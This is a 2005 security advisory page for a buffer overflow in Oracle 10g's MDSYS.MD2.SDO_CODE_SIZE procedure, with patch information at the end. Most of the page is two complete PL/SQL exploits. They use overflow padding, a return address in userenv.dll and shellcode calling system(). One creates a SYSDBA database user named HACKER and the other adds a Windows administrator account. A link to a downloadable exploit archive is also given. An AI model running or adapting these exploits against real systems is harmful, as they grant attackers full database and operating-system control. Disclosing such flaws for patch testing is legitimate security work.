Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
Oracle Exploit Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Name
Oracle Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Systems Affected
Oracle 10g
Severity
High Risk
Category
Buffer Overflow
Vendor URL
http://www.oracle.com/
Credit
Esteban Martinez Fayo
Exploit
http://www.argeniss.com/research/oraclesqlinj.zip
Date
05 May 2005 (V 1.00)
Details
It is possible to create a database user with DBA privileges or a local Windows administrator account by using
a buffer overflow in the procedure MDSYS.MD2.SDO_CODE_SIZE.
Example for Windows 2000 SP4 + Oracle 10.1.0.2
--Create a database user HACKER with SYSDBA privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'echo CREATE USER HACKER IDENTIFIED BY HACKER;> c:\cu.sql'||chr(38)||'echo GRANT DBA TO HACKER;>> c:\cu.sql '||chr(38)||' echo ALTER USER HACKER DEFAULT ROLE DBA;>> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "HACKER" WITH ADMIN OPTION;>> c:\cu.sql'||chr(38)||'echo QUIT>> c:\cu.sql '||chr(38)||' c:\oracle10円.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1> c:\stdout.log 2> c:\stderr.log';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;
--Create a windows OS user HACKER with administrator privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'net user hacker /add '||chr(38)||' net localgroup Administradores hacker /add '||chr(38)||' net localgroup ORA_DBA hacker /add';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
end;
Patch Information
Apply the latest patchsets for Oracle alert 68 or later.
ゥ 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.